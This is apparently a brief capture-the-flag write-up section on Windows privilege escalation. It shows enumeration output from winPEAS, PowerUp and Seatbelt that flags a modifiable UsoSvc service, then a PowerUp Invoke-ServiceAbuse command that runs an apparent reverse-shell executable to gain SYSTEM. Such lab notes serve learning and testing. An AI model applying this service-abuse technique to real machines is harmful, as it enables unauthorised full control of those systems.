6 privesc
PEAS
[+] Modifiable Services
[?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
UsoSvc: AllAccess, Start
[+] Current TCP Listening Ports
Local Address Local Port Remote Address Remote Port State Process ID Process Name
127.0.0.1 5939 0.0.0.0 0 Listening 2992 TeamViewer_Service
PowerUp.ps1
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'
Seatbelt.exe
====== InstalledProducts ======
DisplayName : TeamViewer 7
DisplayVersion : 7.0.43148
Publisher : TeamViewer
InstallDate : 1/1/0001 12:00:00 AM
Architecture : x86
AUTOMATED EXPLOITATION USING POWERUP.PS1
Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command 'C:\users\public\documents\rev.exe'
# nt authority\system
Last updated